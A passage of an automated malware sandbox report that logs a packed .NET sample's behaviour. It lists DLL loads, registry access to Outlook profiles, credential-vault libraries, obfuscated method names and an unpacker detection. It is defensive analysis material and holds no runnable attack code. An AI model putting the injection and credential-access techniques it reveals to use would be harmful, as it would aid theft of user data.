                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\ungziped_file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ungziped_file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ungziped_file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: ungziped_file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: SndVol.pdbGCTL source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ungziped_file.exe, ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: K1A8707LwM6.exe, 0000000F.00000000.1319299130.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp, K1A8707LwM6.exe, 00000011.00000002.3510839344.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs.Net Code: QAZPRhBP1V System.Reflection.Assembly.Load(byte[])
                Source: ungziped_file.exeStatic PE information: 0xD8E8667E [Thu Apr 26 07:40:46 2085 UTC]
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00414C8A push edi; retf 1685h5_2_00414C84
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004140F8 pushfd ; retf 5_2_00414115
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004088BC push 00000002h; iretd 5_2_004088D5
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00401959 push ds; ret 5_2_0040195A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00414103 pushfd ; retf 5_2_00414115
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00402219 push cs; ret 5_2_00402225
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00404A35 push ss; iretd 5_2_00404A40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00401345 pushad ; iretd 5_2_0040134A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00414B0B pushad ; ret 5_2_00414B0E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0040DB16 push edi; retf 5_2_0040DB17
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00403640 push eax; ret 5_2_00403642
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00424653 push ecx; iretd 5_2_0042465C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0041867E push ecx; iretd 5_2_00418680
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_004196F4 push ebp; iretd 5_2_00419715
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0041969C push esi; retf 5_2_0041969D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_00401F76 push ebp; iretd 5_2_00401F7F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E09AD push ecx; mov dword ptr [esp], ecx5_2_011E09B6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052309AD push ecx; mov dword ptr [esp], ecx16_2_052309B6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032A13F2 push ss; iretd 16_2_032A13FD
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032A5279 push 00000002h; iretd 16_2_032A5292
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B503B push ecx; iretd 16_2_032B503D
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C1004 push ecx; iretd 16_2_032C1019
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C1010 push ecx; iretd 16_2_032C1019
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B6059 push esi; retf 16_2_032B605A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B60B1 push ebp; iretd 16_2_032B60D2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C0676 pushfd ; ret 16_2_032C0699
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C0680 pushfd ; ret 16_2_032C0699
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B0AB5 pushfd ; retf 16_2_032B0AD2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B0AC0 pushfd ; retf 16_2_032B0AD2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C0E1F push cs; retf 16_2_032C0EC5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032C0E7E push cs; retf 16_2_032C0EC5
                Source: ungziped_file.exeStatic PE information: section name: .text entropy: 7.893338109024411
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, ogmAnGPWM5AdYaBAIJ.csHigh entropy of concatenated method names: 'r5G836aQfE', 'Gqt8Lt66pu', 'RpK6wQpOjb', 'x9V6qJKQXk', 'Reo60Ey1R0', 'kY46kgtD9q', 'PLv6VlPLHx', 'GZs6SLp4Cw', 'boG6i45gtc', 'Pbr6atOq9f'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, VM3VC0ALniXHIctVQP.csHigh entropy of concatenated method names: 'vKEx6O730T', 'uHvx8BaLOL', 'FUGxeyBBAK', 'GpTxuu28Xe', 'lvnxcxCXCk', 'zd1xZgDNvp', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, KK8pTEomlWy1IxU7rPV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSUxy3ubwE', 'xldx2SYXeS', 'N7qxBQGEy2', 'jhExI5Kq1O', 'P3Lx4A98hu', 'XYrxTDpXnj', 'kWbx1agVTC'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, vmjSMHLnf0WgVXAKwy.csHigh entropy of concatenated method names: 'WOWQjy30ID', 'iHMQO9ScyB', 'J0toEVYXHq', 'i65oDs8jva', 'yJpQyBBS0T', 'GflQ2f78XD', 'rThQBSsqSA', 's8qQIrnThK', 'xj7Q4sYAeW', 'o2hQTahOD4'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.csHigh entropy of concatenated method names: 'GONGInt7d8', 'Sj6G4B77oq', 'edPGTKe15H', 'gyfG1cJip2', 'fvTGYgEvuV', 'sELGMSWG1P', 'XUGGJiGl4w', 'GJtGjm2IV9', 'xAqGFLNqit', 'Xt9GOLC5Wy'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, Q18JAfooaqrrDMdYmYr.csHigh entropy of concatenated method names: 'roGxOHdCg8', 'q8GxzxfQZZ', 'R2pNEZCfLp', 'Cx8NDjnKpU', 'm8NNXYWZD3', 'EqMNpTQHIj', 'CRONPJmmhn', 'BsENhEKdXC', 'FOPNgfpd9y', 'sKDNGDdwEp'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, VeTyqQgBNI31QGaTKK.csHigh entropy of concatenated method names: 'hWNeh0wqZn', 'WgHeG0BidB', 'QGOe83TNEg', 'fhEeunRwqb', 'IMOeZb6wsN', 'ptc8YCBY8V', 'MFr8MiBqY2', 'yRL8J4NIPj', 'UEl8jcqBtv', 'cUi8FgkeEp'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, FtXGmbeELiHFnvy850.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NSsXFA2lP2', 'zvUXOdCcaj', 'nikXz2eDmA', 'lHLpEv1llw', 'HuPpDhVlU2', 'fMipXjB28F', 'B1mppdmfy3', 'GDwpb8f8lGtE1ntQoMI'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CE2MNrTjHvdux83PQW.csHigh entropy of concatenated method names: 'ToString', 'fchmye6Lbt', 'wa5mH7FpKB', 'O6FmwFYEiy', 'lvemqhq4QG', 'mFIm03rbj9', 'FFRmkYQwh3', 'X6kmVu1EZS', 'bQbmS2WPAq', 'T9BmiTxEGJ'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, AougmqrpMYXVtcExiY.csHigh entropy of concatenated method names: 'MibCawtrse', 'y6bC2axoe7', 'VQBCIN9JtT', 'W9wC4UINcU', 'FlxCHgoNQ3', 'nMgCwaYDD3', 'XfuCqKAq8V', 'NuyC057b30', 'XQWCkJWco1', 'he6CVNATBx'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, EGK1BNQm4iFF7NFmNV.csHigh entropy of concatenated method names: 'u4FnKLpvXn', 'FvGnrItgHh', 'NhknsUkuPr', 'mEjnHTEksK', 'XAQnq3Kpqa', 'sgnn0fye5Y', 'BhqnV5oXBv', 'rlcnSvFse2', 'EQ9nahL8hb', 'VoqnylDbJ6'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, gMjrZWo5BQEndI0iuW5.csHigh entropy of concatenated method names: 'ToString', 'e5ENKRr2Ru', 'o3VNrsrcg4', 'CtjNlG77m1', 'iXONsyGeOJ', 'eTwNHSvBlD', 'wWCNwwvIgI', 'E8mNq1wrYW', 'bjPpAcGNnWLAdLvFtCg', 'zl4OYkG9MtD8cUVIcOs'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DFalVoo0M1miFDNwUhY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bEYvc9ruXL', 'JFivxBX5l1', 'TV3vNOlFOP', 'rWGvvAlDF3', 'i38vfxLTdU', 'yYwvWGx6TF', 'NuZvdtXbKO'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, nhrSIiMtXvnmU0knkr.csHigh entropy of concatenated method names: 'hLDcsjr5BM', 'ekFcHiBr9Y', 'NCdcwLliLJ', 'wD8cq6V6SZ', 'Morc0gwJ0o', 'tlXckc3Swq', 'LJCcVNMg5N', 'ChicS52AKO', 'dO3ci7guH3', 'CXqca49PTh'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, eKlQLyzhrMev4X0GVl.csHigh entropy of concatenated method names: 'kE9xbHcfrc', 'sCBxKKFjXX', 'ELExr7t9Mm', 'TvhxsARc6c', 'xn7xHEfFne', 'auexqLtDyy', 'tPLx0hNMGu', 'hunxdZuKGC', 'gbUxtjt4eu', 'aT3x7RCGUi'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, i6b2f5VpRRZl8rOsns.csHigh entropy of concatenated method names: 'txxugaRCju', 'MsKu6lgihn', 'YYpue4Qpe4', 'b9xeOeiOKY', 'mAmezhy1eS', 'mmIuElUsUJ', 'EetuDiu74P', 'Op3uXT82wQ', 'WjuupJJva4', 'jxpuPmDCDC'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, zAfDHb3gGaQkWEOLnQ.csHigh entropy of concatenated method names: 't2But9ofRc', 'aDCu7cK7P0', 'bTDuRZiuhw', 'rwnu5UuNEd', 'jZEu3jMuWK', 'gdkubmyF25', 'xDfuLTxc1k', 'qebuKbl4cf', 'i21urVItPD', 'BHaulSK9R8'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DZeJXG5R0ckqsgV7rJ.csHigh entropy of concatenated method names: 'DEER1lTmg', 'lKN5WunFJ', 'OwRbR8BN9', 'EZOLSq4hS', 'UrsrQ3RnT', 'YZ7lqdPcC', 'YYpJnb98a93W5BSlSx', 'maKCvfPDlXuOhubwSA', 'oFZo6iZDN', 'YtwxhsBGY'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DgR6ixlGCWQDCNLRsT.csHigh entropy of concatenated method names: 'Dispose', 'DjjDFfZNS1', 'YZgXHJtejL', 'b4CvYghHWq', 'hinDOSaJqu', 'jOhDzIAJUy', 'ProcessDialogKey', 'lhaXEDijto', 'WijXDdfW8i', 'LtGXXXRi6U'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, LTC2WObMSVwwNqtFNN.csHigh entropy of concatenated method names: 'Imy65w5v8S', 'stZ6b8ITbg', 'ApT6KEiQ39', 'VR66rc8Bcq', 'DoP6CK9Eig', 'Yjd6mYteyy', 'NPV6Q7Gx9M', 'woo6oBiuUW', 'YZm6c7Qtue', 'cmQ6xwKmL8'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.csHigh entropy of concatenated method names: 'CvlphJJsN0', 'TBepgr6CJa', 'V1ypGqDpNY', 'KGTp6ZHfcC', 'K0xp8H560t', 'g4tpeXf7Jo', 'Un9puMBJIW', 'KI8pZtwltG', 'Rs2p9uHgQ9', 'TGXpAQFAGv'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, UtluiP0sBolXRu9pZR.csHigh entropy of concatenated method names: 'YQ1Du6ihdo', 'NSDDZTCy3Q', 'H9KDA4GMRD', 'rWoDUpCsDs', 'BIFDCGFHRM', 'wQNDmUQjvP', 'XGN2l5xtVc5tTGNyiv', 'OeWVcQAMBEP0q8kQw6', 'aQNDDdIgoc', 'BWlDpPyI1s'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CJPigY2gYYha6NjUBm.csHigh entropy of concatenated method names: 'hCbQAcJ4Ah', 'YItQUvMmCr', 'ToString', 'awsQgiq9x7', 'BBnQG58G2i', 'FGOQ6rLooA', 'xC5Q8ow2CD', 'iv9Qe2VFaT', 'B0UQuvrb8a', 'svGQZd4KGK'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, aN7McCEUAw0ywPhnX7.csHigh entropy of concatenated method names: 'lNWcC11CJQ', 'ksgcQWfQZD', 'XdyccoYRYn', 'JIgcNP1t9K', 'u8ncfEDxLM', 'aMLcdI7wUX', 'Dispose', 'F39ogvvARK', 'caWoGofitN', 'cppo6g4w7S'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
